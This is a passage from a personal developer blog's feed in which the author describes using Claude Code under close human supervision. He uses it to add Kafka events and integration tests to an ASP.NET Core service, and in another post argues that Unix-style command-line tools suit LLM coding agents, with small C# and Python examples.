  <span class="kt">var</span> <span class="n">createBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">CreateBusinessAsync</span><span class="p">(</span><span class="n">businessRequest</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">updatedBusiness</span> <span class="p">=</span> <span class="c1">// logic to update the business including new People</span>
  <span class="c1">// Act</span>
  <span class="kt">var</span> <span class="n">response</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">UpdateBusinessAsync</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">);</span>
  <span class="c1">// Assert</span>
  <span class="kt">var</span> <span class="n">getBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">GetBusinessAsync</span><span class="p">(</span><span class="n">createBusinessResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
  <span class="c1">// same assertions as above then</span>
  <span class="k">await</span> <span class="nf">WaitForConditionAsync</span><span class="p">(</span>
    <span class="p">()</span> <span class="p">=&gt;</span> <span class="n">ReceivedKafkaEvents</span><span class="p">&lt;</span><span class="n">PersonBusinessLink</span><span class="p">&gt;(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">).</span><span class="nf">Count</span><span class="p">()</span> <span class="p">&gt;=</span> <span class="m">2</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">linkEvents</span> <span class="p">=</span> <span class="n">ReceivedKafkaEvents</span><span class="p">&lt;</span><span class="n">PersonBusinessLink</span><span class="p">&gt;(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">);</span>
  <span class="c1">// assert the link events match expectations</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This was basically following the pattern of other tests - but Claude found that pattern, without prompting, in a different test file - Business tests didn’t have any Kafka tests at this stage. I was pretty impressed.</p>
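
<p>The polling helper is what lets the test cope with Kafka delivering events asynchronously. Our real <code class="language-plaintext highlighter-rouge">WaitForConditionAsync</code> isn’t shown here, so this is only a guess at the general shape of such a helper; the <code class="language-plaintext highlighter-rouge">TestPolling</code> class, the parameter names and the default timings are all assumptions.</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Diagnostics;
using System.Threading.Tasks;

public static class TestPolling
{
    // Polls the condition until it is true, or throws once the timeout passes.
    public static async Task WaitForConditionAsync(
        Func&lt;bool&gt; condition, TimeSpan? timeout = null, TimeSpan? pollInterval = null)
    {
        var limit = timeout ?? TimeSpan.FromSeconds(10);             // assumed default
        var delay = pollInterval ?? TimeSpan.FromMilliseconds(100);  // assumed default
        var stopwatch = Stopwatch.StartNew();

        while (!condition())
        {
            if (stopwatch.Elapsed &gt; limit)
                throw new TimeoutException($"Condition not met within {limit}.");
            await Task.Delay(delay);
        }
    }
}
</code></pre></div></div>

<p>Failing with a timeout rather than waiting forever matters in a test like this: if the events never arrive, the test fails with a clear message instead of hanging the run.</p>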

<p>And then it ran the tests - and they failed. :)</p>

<p>At this stage Claude started thrashing - trying multiple things that I could see wouldn’t help. So again, I stopped it, then sat down with the debugger and my weak human brain.</p>

<p>(It turns out that I also needed to add a new Producer in our Kafka setup - an easy fix, once I found it)</p>

<p>And then the tests passed, Claude helped me add more similar tests for other endpoints, and the task was done.</p>

<h3 id="this-isnt-10x-speed---but-its-not-junk-either">This isn’t 10x speed - but it’s not junk either</h3>

<p>I wanted to post this example as it’s a good midpoint between “AI can replace developers” and “AI is rubbish and produces junk”. More on that in <a href="/2025/07/19/clowns-to-the-left-of-me">my next post</a>.</p>

<p>This worked, with some human guidance. It needed help - maybe with future improvements and better context it will need less help, but I doubt this kind of thing will “just work” any time in the near future. That test failure, for example, needed a lot of investigation a long way from the context of the code or the tests being written.</p>

<p>And I’m working in a similar way, and getting similar benefits, all over the place.</p>

<p>Sometimes the LLM actually works first time - I added a feature flag to our application to turn one feature off in some environments, and the code needed no checks at all. And it’s <em>great</em> at writing small simple on-demand scripts - things like “write a Python script to graph our git commits over time” or “write a script to generate a Slack message showing our outstanding pull requests”.</p>

<p>And sometimes it doesn’t help at all - it’s worth learning when to say “ok, this is too trivial / too hard” and writing it yourself.</p>

<p>There is <em>so</em> much to learn here - when to use the tools, how to set up context, what MCP or other external information to bring in - and it’s constantly changing.</p>

<p>But I’m finding it an exciting time - this stuff, used carefully, is very helpful, and a lot of fun.</p>

<h2 id="but-dont-forget-the-downsides">But don’t forget the downsides</h2>

<p>I feel I need a standard disclaimer at the end of any AI post. We need to remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarchs</a><sup id="fnref:broligarchy" role="doc-noteref"><a href="#fn:broligarchy" class="footnote" rel="footnote">2</a></sup> whose interests are personal power and destabilising democracy, not helping the world.</p>

<p>These tools consume vast amounts of power, which, due to our failure to charge for <a href="https://en.wikipedia.org/wiki/Externality">externalities</a>, means they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is <a href="https://www.wheresyoured.at/subprimeai/">an unsustainable bubble</a> and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users.</p>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>yet again, follow the mantra ‘treat the LLM like a very fast keen naive junior developer with lots of resources but no long-term knowledge’ <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:broligarchy" role="doc-endnote">
      <p>Thanks <a href="https://broligarchy.substack.com/about">Carole Cadwalladr</a> for introducing me to the very useful term <a href="https://en.wikipedia.org/wiki/Broligarchy">Broligarchy</a>! <a href="#fnref:broligarchy" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="software development" /><category term="ai" /><category term="software-development" /><category term="claude" /><category term="asp.net" /><summary type="html"><![CDATA[I thought it’d be worth posting an example of a bigger task I did the other day - just to show what can be done, without crazy vibe-coding, on a non-greenfields app, using ASP.Net Core not some simplistic front-end tooling. This was originally part of a longer post but I thought it was worth splitting - this example is used in my post Clowns to the left of me … The task - Sending a message when data changes We have an ASP.Net core application which includes a relationship between Businesses and People, where that relationship is modeled as a collection of Contacts: erDiagram BUSINESS { Guid Id PK } CONTACT { Guid BusinessId PK,FK Guid PersonId PK,FK } PERSON { Guid Id PK } BUSINESS ||--o{ CONTACT : "has" PERSON ||--o{ CONTACT : "is a" Note that I have configured a lot of context in CLAUDE.md and linked files, including things like project structure, idioms, how to run tests, MCP servers to use, and more. The context helps a lot, but is a bit too much detail for this post. I started prompting Claude Code with How do we currently trigger sending Kafka events? This was more for my understanding than anything, but also meant Claude loaded up more on the code structure - everything it has seen in a session so far makes up its context, so having this knowledge helps with the next stage. Then the main prompt: “OK - I’d like to add a specific kind of event - but only when a relationship between a Business and a Contact changes. If a Contact is added to a Business, or removed from a Business, we need to send an event of type PersonBusinessLink which is defined in these classes: namespace Liberis.Events.ThisProject public record PersonBusinessLink() { public string? PersonId { get; set; } public string? 
BusinessId { get; set; } public PersonBusinessLinkType Type { get; set; } } public enum PersonBusinessLinkType() { PersonBusinessLinked, PersonBusinessUnlinked, } these events should be generated with the type PersonBusinessLinked if a person is added, and PersonBusinessUnlinked if a person is removed - note this mimics the existing Contact domain entity which links a Business to a Person. I pasted in the classes because they are generated from protobuf schemas in another project and I don’t think Claude has access to the decompiled code - it’d be interesting to work out if it could be taught to read it. Claude’s first attempt Claude churned away for a while - and produced a quite good first pass; it modified The Business service when a business was created, or modified, or patched more on this below a new Domain type was added for PersonBusinessLinkType (following project conventions) a new Mapper method was added which took a Contact, a businessId and a PersonBusinessLinkType and generated a Kafka message a new Kafka topic was added “person-business-link” - this was a guess on Claude’s part, and not quite right a new handler was added to our KafkaEventDispatcher to dispatch messages to the right topic based on the new event type the Dispatcher was injected into the BusinessService Course correcting not vibe coding I should note, I didn’t just leave Claude going - you don’t want to let it go too far off piste1, so I kept an eye on changes. I have it set up to ask me before every change, so when it chose the wrong Kafka topic I said “no” to the proposed change, then told it the right topic, and it kept on going. Sometimes on simple tasks I let it do more steps without checking, but that means more work cleaning up later; this is one of the interesting learning exercises working this way, determining when to be slow and careful, and when to be fast but need more clean-up effort later. 
These are the sorts of corrections I had to make: “I think you should use the business ID as the partition key” as it chose the wrong key “We should dispatch events before committing the unit of work, so the outbox pattern works” “This should be in the namespace Foo.Bar as that’s where other similar things are” “You don’t need to log anything here, our dispatcher has observability built in” “Please don’t add that comment - only comment on things that aren’t obvious” In all these cases though, I didn’t need to write any code, I just guided it occasionally, like I would a junior developer. One who loves comments and logging and excess documentation! (You can train it out of some of these things, using more initial context - but some habits are harder to shift than others) Fixing a bigger problem I did catch it making one mistake - our method to patch a business follows roughly this logic: Start a transaction Find the business Patch the business, returning the updated complete business object … some extra logic around related data that might have changed Commit the transaction Return a success payload The code Claude wrote was roughly: Start a transaction Find the business Patch the business, returning the updated complete business object … some extra logic around related data that might have changed Check for dispatching person/business updates: Fetch the original unchanged business Check whether the original business had added/removed people compared to the new one Dispatch any changes Commit the transaction Return a success payload This would probably work, (assuming we could read the pre-transaction data), but was doing unnecessary work. I asked Claude: Can’t we get the original business contact info earlier in the method, rather than at the end? And it tried - quite hard - to do this. 
The trouble is, we aren’t performing the logic above with procedural code - we use chained functions with monadic Result and Option return types, so the chain passes a Result wrapping either a Business or an Error payload, and errors get passed down the chain rather than using exceptions. (Or sometimes Result&lt;Option&lt;Business&gt;&gt; when a function like FindBusiness might return no business without it being an error) so the code is a bit harder for Claude to understand: var result = await businessRepository.FindBusinessAsync(...) .ThenAsync(businessToUpdateOption =&gt; businessToUpdateOption.Match( some: async businessToUpdate =&gt; { // update the business and return the updated business } none: () =&gt; // no business so we had None - return a new Error result )) .ThenAsync(updatedBusiness =&gt; // more business logic if the previous update succeeded ) .ThenAsync(async updatedBusiness =&gt; var originalBusiness = // logic to fetch the original business // the new kafka dispatch: await DispatchContactChangeEventsAsync(originalBusiness, updatedBusiness); await unitOfWork.CommitAsync(); return Success(updatedBusiness); ) Claude actually almost managed to fix this. It worked out that instead of passing Result&lt;businessToUpdate&gt; through the function chain, it should pass a tuple Result&lt;(originalBusiness, businessToUpdate)&gt; and re-threaded all the functions to match: var result = await businessRepository.FindBusinessAsync(...) 
.ThenAsync(businessToUpdateOption =&gt; businessToUpdateOption.Match( some: async businessToUpdate =&gt; { // update the business and then return Result(businessToUpdate, updatedBusiness) } none: () =&gt; // no business so we had None - return a new Error result )) .ThenAsync(businessPair =&gt; // destructure businessPair into (businessToUpdate, updatedBusiness) // more business logic if the previous update succeeded ) .ThenAsync(async businessPair =&gt; // the new kafka dispatch: await DispatchContactChangeEventsAsync(businessPair.Original, businessPair.Updated); await unitOfWork.CommitAsync(); return Success(businessPair.Updated); ) But - it hit a syntax error. One of the error paths (not shown) was still returning Result&lt;Business&gt; not the tuple. It tried a few times to correct it, but it gave up and said “I think the logic is right but there are still a few syntax errors” To its credit, I’d prefer this than it churning forever or hallucinating an incorrect result. I managed to fix it (with a bit of pain - we override ThenAsync in ways which make diagnosing this tricky even for a human) and then Claude could take over again. Testing I really should have started with a test! I do have instructions in my context about testing, but neither Claude nor I did this in proper TDD fashion. But when I asked Can you find an integration test that can test the new event? Just change one test for now to see if it is working. Claude went away, found an integration test (we use Test Containers to test against dockerised Kafka) and modified it quite sensibly. 
It took a test that was roughly: [Fact] public async Task UpdateBusinessAsync_UpdatesBusiness() { // Arrange var businessRequest = ARandomBusinessRequest(...); var createBusinessResponse = await CreateBusinessAsync(businessRequest); var updatedBusiness = // logic to update the business including new People // Act var response = await UpdateBusinessAsync(updatedBusiness) // Assert var getBusinessResponse = await GetBusinessAsync(createBusinessResponse.Id); // lots of assertions } And made it [Fact] public async Task UpdateBusinessAsync_UpdatesBusiness() { // Reset shared state ClearReceivedKafkaEvents(Topics.PersonBusinessLink); // Arrange var businessRequest = ARandomBusinessRequest(...); var createBusinessResponse = await CreateBusinessAsync(businessRequest); var updatedBusiness = // logic to update the business including new People // Act var response = await UpdateBusinessAsync(updatedBusiness) // Assert var getBusinessResponse = await GetBusinessAsync(createBusinessResponse.Id); // same assertions as above then await WaitForConditionAsync( () =&gt; ReceivedKafkaEvents&lt;PersonBusinessLink&gt;(Topics.PersonBusinessLink).Count() &gt;= 2); var linkEvents = ReceivedKafkaEvents&lt;PersonBusinessLink&gt;(Topics.PersonBusinessLink); // assert the link events match expectations } This was basically following the pattern of other tests - but Claude found that pattern, without prompting, in a different test file - Business tests didn’t have any kafka tests at this stage. I was pretty impressed. And then it ran the tests - and they failed. :) At this stage Claude started thrashing - trying multiple things that I could see wouldn’t help. So again, I stopped it, then sat down with the debugger and my weak human brain. (It turns out that I also needed to add a new Producer in our kafka setup - an easy fix, once I found it) And then the tests passed, Claude helped me add more similar tests for other endpoints, and the task was done. 
This isn’t 10x speed - but it’s not junk either I wanted to post this example as it’s a good midpoint between “AI can replace developers” and “AI is rubbish and produces junk”. More on that in my next post. This worked, with some human guidance. It needed help - maybe with future improvements and better context it will need less help, but I doubt this kind of thing will “just work” any time in the near future. That test failure, for example, needed a lot of investigation a long way from the context of the code or the tests being written. And I’m working in a similar way, and getting similar benefits, all over the place. Sometimes the LLM actually works first time - I added a feature flag to our application to turn one feature off in some environments, and the code needed no checks at all. And it’s great at writing small simple on-demand scripts - things like “write a python script to graph our git commits over time” or “write a script to generate a Slack message showing our outstanding pull requests”. And sometimes it doesn’t help at all - it’s worth learning when to say “ok, this is too trivial / too hard” and writing it yourself. There is so much to learn here - when to use the tools, how to set up context, what MCP or other external information to bring in - and it’s constantly changing. But I’m finding it an exciting time - this stuff, used carefully, is very helpful, and a lot of fun. But don’t forget the downsides I feel I need a standard disclaimer at the end of any AI post. We need to remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech broligarchs2 whose interests are personal power and destabilising democracy, not helping the world. They consume vast amounts of power, which due to our failure to charge for externalities, mean they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. 
And there are many signs that the funding for this is an unsustainable bubble and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users. yet again, follow the mantra ‘treat the LLM like a very fast keen naive junior developer with lots of resources but no long-term knowledge’ &#8617; Thanks Carole Cadwalladr for introducing me to the very useful term Broligarchy! &#8617;]]></summary></entry><entry><title type="html">The power of the Unix philosophy for LLM agentic tools</title><link href="https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools" rel="alternate" type="text/html" title="The power of the Unix philosophy for LLM agentic tools" /><published>2025-07-11T00:00:00+01:00</published><updated>2025-07-11T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools</id><content type="html" xml:base="https://blog.korny.info/2025/07/11/the-power-of-the-unix-philosophy-for-llm-agentic-tools"><![CDATA[<p>I was demonstrating Claude Code to a colleague the other day - I was working on an ASP.Net Core C# service, using Claude within the JetBrains Rider IDE. And my colleague said “it uses a lot of bash commands like <code class="language-plaintext highlighter-rouge">find</code> - why doesn’t it hook into the IDE to understand the structure?”</p>

<p>I was a bit surprised by this - I quite like the way it uses small simple commands. Musing about it afterwards, I realised that this is actually an example of the <a href="https://en.wikipedia.org/wiki/Unix_philosophy">Unix philosophy</a> - “write programs that do one thing and do it well”.</p>

<p>I am already someone who loves diving into the command-line, I have a string of handy tools I use all the time - <a href="https://jqlang.github.io/jq/">jq</a>, <a href="https://github.com/Byron/dua-cli">dua</a>, <a href="https://github.com/BurntSushi/ripgrep">ripgrep</a>, <a href="https://osxdaily.com/2007/03/05/manipulating-the-clipboard-from-the-command-line/">pbcopy and pbpaste</a>, plus all the standard shell tools like find, grep etc - I was already enjoying this aspect of using LLM-based tools; they can be easily trained to use the tools I use already.</p>

<p>But I realise that this also reflects a philosophical difference between different software engineering communities. There are people who love lots of small unix-style tools, who live in the terminal or at least fall back to terminal commands regularly<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> - but there are also people who love their IDEs, their smart powerful tooling. It reminds me somewhat of the famous essay <a href="http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral-bazaar/">the Cathedral and the Bazaar</a> from way back in 1998.</p>

<p>A pertinent quote:</p>

<blockquote>
  <p>Linus Torvalds’s style of development—release early and often, delegate everything you can, be open to the point of promiscuity—came as a surprise. No quiet, reverent cathedral-building here—rather, the Linux community seemed to resemble a great babbling bazaar of differing agendas and approaches … out of which a coherent and stable system could seemingly emerge only by a succession of miracles.</p>
</blockquote>

<p>Sounds a bit familiar.<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup></p>

<p>Anyway - my colleague seemed to be surprised that the LLM wasn’t embracing the large, complicated, sophisticated modelling that a tool like Rider does - in fact up to now you <em>needed</em> a tool like Rider to understand complex ecosystems like ASP.Net.</p>

<p>Whereas I quite like that it <em>doesn’t have to</em> - it uses the Unix philosophy - text-based input and output (which language models naturally work well with), small fast stand-alone tools, that do one thing and one thing well. And despite the continued need for powerful IDEs, the world has shifted - even Cathedrals like ASP.Net now supply quite good command-line tools like <code class="language-plaintext highlighter-rouge">dotnet</code> for building, formatting, linting, and testing, with an LLM-friendly text interface. With all these tools, plus the ability to iterate over solutions and use trial-and-error to course correct, LLM-based tools do a quite good job of what previously needed a huge complex IDE.</p>
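<p>To make the “text in, text out” point concrete, here is a minimal sketch of how an agent-style harness might call a command-line tool and hand the result back to a model as plain text. The <code class="language-plaintext highlighter-rouge">run_tool</code> helper is hypothetical, not how Claude Code is actually implemented, and the demo command is a stand-in so the sketch runs anywhere:</p>

```python
import subprocess
import sys


def run_tool(args, timeout=60):
    """Run a command-line tool and return its result as plain text."""
    completed = subprocess.run(
        args,
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,  # a failing build or test run is still useful information
    )
    return (
        f"exit code: {completed.returncode}\n"
        f"stdout:\n{completed.stdout}"
        f"stderr:\n{completed.stderr}"
    )


if __name__ == "__main__":
    # Stand-in command; on a real project this could be
    # ["dotnet", "test"] or ["rg", "TODO"].
    print(run_tool([sys.executable, "-c", "print('hello from a tool')"]))
```

<p>Everything the model needs (exit code, output, errors) comes back as one string, which is roughly why small text-based tools are so easy to plug in.</p>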

<p>Often Claude Code does a <em>better</em> job than the smart IDEs for a lot of refactorings. I remember when refactoring IDEs first appeared, and they were amazing - I could say “extract these lines into a function” and it just worked. But now I can say to Claude “we are doing this repetitive pattern in our tests - can you change it to test against an array using Fluent Assertions instead?” and it turns:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="n">Count</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Be</span><span class="p">(</span><span class="m">2</span><span class="p">);</span>
<span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Contain</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span> <span class="p">==</span> <span class="n">newPersonResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
<span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Contain</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span> <span class="p">==</span> <span class="n">personResponse1</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
</code></pre></div></div>

<p>into:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Select</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span><span class="p">)</span>
  <span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">BeEquivalentTo</span><span class="p">(</span>
    <span class="p">[</span><span class="n">newPersonResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">,</span> <span class="n">personResponse1</span><span class="p">.</span><span class="n">Id</span><span class="p">]);</span>
</code></pre></div></div>

<p>and then it can find the equivalent pattern through all the tests, and do a good job of fixing them all.<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup></p>

<p>Claude Code itself also follows this philosophy - instead of being tightly coupled to an IDE, it runs in a terminal, with a text interface, and they have plugins for various IDEs to provide a smarter user interface - using the editor’s context and UI elements for changes.  But basically it’s a text app - which must keep their complexity much lower than the competitors who are building their tools tightly coupled to particular editors.</p>

<p>Another example - my personal music collection is stored as mp3 files indexed and served by <a href="https://www.musicpd.org/">MPD</a>, the Music Player Daemon. It used to be in the Cathedral-like iTunes, but as Apple enshittified their apps, and my venerable iPod died (many years ago), I moved to MPD for storage, and other tools for UIs - and now this fits well with LLM tools. It has a command-line interface in <a href="https://www.musicpd.org/clients/mpc/">mpc</a>, which I’m already using to play music in Obsidian - see <a href="/2024/09/06/custom-mac-uri-schemes-obsidian">my previous blog post</a>. So it’d be easy to call this from an LLM - or wrap it in an MCP service for a home-grown Siri- or Alexa-like music player.</p>
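<p>As a rough illustration of what such a wrapper could look like, the sketch below maps a small whitelist of “intents” onto <code class="language-plaintext highlighter-rouge">mpc</code> argument lists. The intent names, the <code class="language-plaintext highlighter-rouge">ALLOWED</code> table and both functions are assumptions made up for this example; only the <code class="language-plaintext highlighter-rouge">mpc</code> subcommands themselves are real:</p>

```python
import subprocess

# Hypothetical whitelist: intent name -> mpc arguments.
ALLOWED = {
    "play": ["play"],
    "pause": ["pause"],
    "next": ["next"],
    "now_playing": ["current"],
}


def mpc_command(intent, artist=None):
    """Translate a requested intent into an mpc argument list."""
    if intent == "queue_artist":
        if not artist:
            raise ValueError("queue_artist needs an artist name")
        return ["mpc", "findadd", "artist", artist]
    if intent not in ALLOWED:
        raise ValueError(f"unsupported intent: {intent}")
    return ["mpc"] + ALLOWED[intent]


def run_intent(intent, artist=None, runner=subprocess.run):
    """Run the mpc command for an intent and return its text output."""
    result = runner(mpc_command(intent, artist), capture_output=True, text=True)
    return result.stdout.strip()
```

<p>Keeping the command building separate from the execution means the mapping can be checked without a running MPD server, and the whitelist stops a confused model from running arbitrary commands.</p>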

<p>And a third example - this blog is written using <a href="https://jekyllrb.com/">Jekyll</a>, which means it’s just markdown text. LLMs <em>love</em> working with markdown. I don’t use LLMs to write the text<sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup> but I can say “please turn the word Jekyll into a link” and save a lot of annoying toil. An LLM would be much harder to integrate into a heavyweight GUI blog editor like Wix.</p>

<hr />

<p>Anyway I digress. Tired brain tends to ramble. Back to my main thought - LLM code augmentation tools work best where they, and their users, embrace Unix-philosophy tools - multiple small tools that do one thing each, that interact with simple text-based formats.</p>

<p>I can see this being a bit of a struggle, and a culture clash, for people who love the Cathedral model - big complex clever systems. Often these are more powerful, more robust, more carefully engineered, and safer than the Bazaar of small independent tools. But I think LLMs are tipping the balance further to where the smaller tools, despite the risks and chaos, are dramatically more productive.</p>

<p>We just need to make sure we keep on top of the risks and chaos, and don’t drown in a world of technical debt and AI slop.</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>I’m not a terminal purist - I don’t use vim, I still like GUIs for code editing, graphical tree widgets, visualisations… <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>I had a longer digression here but removed it as it went too far off piste! I encourage people to read the essay, it’s surprisingly relevant still <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>It’s non-deterministic, you have to check it for hallucinations, but they are pretty rare on simple changes like this. And it will run the tests after every change, and iterate if something goes wrong. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>I’m fine with expressing my ideas in writing, though I tend to digress too much! <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="ai" /><category term="llm" /><category term="agents" /><category term="unix" /><category term="philosophy" /><category term="tools" /><summary type="html"><![CDATA[I was demonstrating Claude Code to a colleague the other day - I was working on an ASP.Net Core C# service, using Claude within the JetBrains Rider IDE. And my colleague said “it uses a lot of bash commands like find - why doesn’t it hook into the IDE to understand the structure?” I was a bit surprised by this - I quite like the way it uses small simple commands. Musing about it afterwards, I realised that this is actually an example of the Unix philosophy - “write programs that do one thing and do it well”. I am already someone who loves diving into the command-line, I have a string of handy tools I use all the time - jq, dua, ripgrep, pbcopy and pbpaste, plus all the standard shell tools like find, grep etc - I was already enjoying this aspect of using LLM-based tools; they can be easily trained to use the tools I use already. But I realise that this also reflects a philosophical difference between different software engineering communities. There are people who love lots of small unix-style tools, who live in the terminal or at least fall back to terminal commands regularly1 - but there are also people who love their IDEs, their smart powerful tooling. It reminds me somewhat of the famous essay the Cathedral and the Bazaar from way back in 1998. A pertinent quote: Linus Torvalds’s style of development—release early and often, delegate everything you can, be open to the point of promiscuity—came as a surprise. No quiet, reverent cathedral-building here—rather, the Linux community seemed to resemble a great babbling bazaar of differing agendas and approaches … out of which a coherent and stable system could seemingly emerge only by a succession of miracles. 
Sounds a bit familiar.2 Anyway - my colleague seemed to be surprised that the LLM wasn’t embracing the large, complicated, sophisticated modelling that a tool like Rider does - in fact up to now you needed a tool like Rider to understand complex ecosystems like ASP.Net. Whereas I quite like that it doesn’t have to - it uses the Unix philosophy - text-based input and output (which language models naturally work well with), small fast stand-alone tools, that do one thing and one thing well. And despite the continued need for powerful IDEs, the world has shifted - even Cathedrals like ASP.Net now supply quite good command-line tools like dotnet for building, formatting, linting, and testing, with an LLM-friendly text interface. With all these tools, plus the ability to iterate over solutions and use trial-and-error to course correct, LLM-based tools do a quite good job of what previously needed a huge complex IDE. Often Claude Code does a better job than the smart IDEs for a lot of refactorings. I remember when refactoring IDEs first appeared, and they were amazing - I could say “extract these lines into a function” and it just worked. 
But now I can say to Claude “we are doing this repetitive pattern in our tests - can you change it to test against an array using Fluent Assertions instead?” and it turns: getBusinessResponse.People.Count.Should().Be(2); getBusinessResponse.People.Should().Contain(p =&gt; p.Id == newPersonResponse.Id); getBusinessResponse.People.Should().Contain(p =&gt; p.Id == personResponse1.Id); into: getBusinessResponse.People.Select(p =&gt; p.Id) .Should().BeEquivalentTo( [newPersonResponse.Id, personResponse1.Id]); and then it can find the equivalent pattern through all the tests, and do a good job of fixing them all.3 Claude Code itself also follows this philosophy - instead of being tightly coupled to an IDE, it runs in a terminal, with a text interface, and they have plugins for various IDEs to provide a smarter user interface - using the editor’s context and UI elements for changes. But basically it’s a text app - which must keep their complexity much lower than the competitors who are building their tools tightly coupled to particular editors. Another example - my personal music collection is stored as mp3 files indexed and served by MPD, the Music Player Daemon. It used to be in the Cathedral-like iTunes, but as Apple enshittified their apps, and my venerable iPod died (many years ago) I moved to MPD for storage, and other tools for UIs - and now this fits well with LLM tools. It has a command-line interface in mpc, I’m already using this to play music in Obsidian - see my previous blog post. So it’d be easy to call this from an LLM - or wrap it in an MCP service for a home-grown Siri or Alexa like music player. And a third example - this blog is written using Jekyll, which means it’s just markdown text. LLMs love working with markdown. I don’t use LLMs to write the text4 but I can say “please turn the word Jekyll into a link” and save a lot of annoying toil. An LLM would be much harder to integrate into a heavyweight Gui blog editor like Wix. Anyway I digress. 
Tired brain tends to ramble. Back to my main thought - LLM code augmentation tools work best where they, and their users, embrace Unix-philosophy tools - multiple small tools that do one thing each, that interact with simple text-based formats. I can see this being a bit of a struggle, and a culture clash, for people who love the Cathedral model - big complex clever systems. Often these are more powerful, more robust, more carefully engineered, and safer than the Bazaar of small independent tools. But I think LLMs are tipping the balance further to where the smaller tools, despite the risks and chaos, are dramatically more productive. We just need to make sure we keep on top of the risks and chaos, and don’t drown in a world of technical debt and AI slop. I’m not a terminal purist - I don’t use vim, I still like GUIs for code editing, graphical tree widgets, visualisations… &#8617; I had a longer digression here but removed it as it went too far off piste! I encourage people to read the essay, it’s surprisingly relevant still &#8617; It’s non-deterministic, you have to check it for hallucinations, but they are pretty rare on simple changes like this. And it will run the tests after every change, and iterate if something goes wrong. &#8617; I’m fine with expressing my ideas in writing, though I tend to digress too much! 
&#8617;]]></summary></entry><entry><title type="html">Parsing pdf files is trickier than I thought</title><link href="https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought" rel="alternate" type="text/html" title="Parsing pdf files is trickier than I thought" /><published>2025-07-06T00:00:00+01:00</published><updated>2025-07-06T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought</id><content type="html" xml:base="https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought"><![CDATA[<p>I had a shower thought the other day - “I’m an ebook hoarder, I have a bunch of technical ebooks as mobi/epub files, but also pdfs.  It’d be nice to be able to slurp them up into LLM tools - for summarizing, for categorising and the rest”.  I’d already done epubs (see my recent <a href="/2025/06/27/analysing-stonemouth-with-llm">Stonemouth analysis</a>) so PDFs should be not too hard?</p>

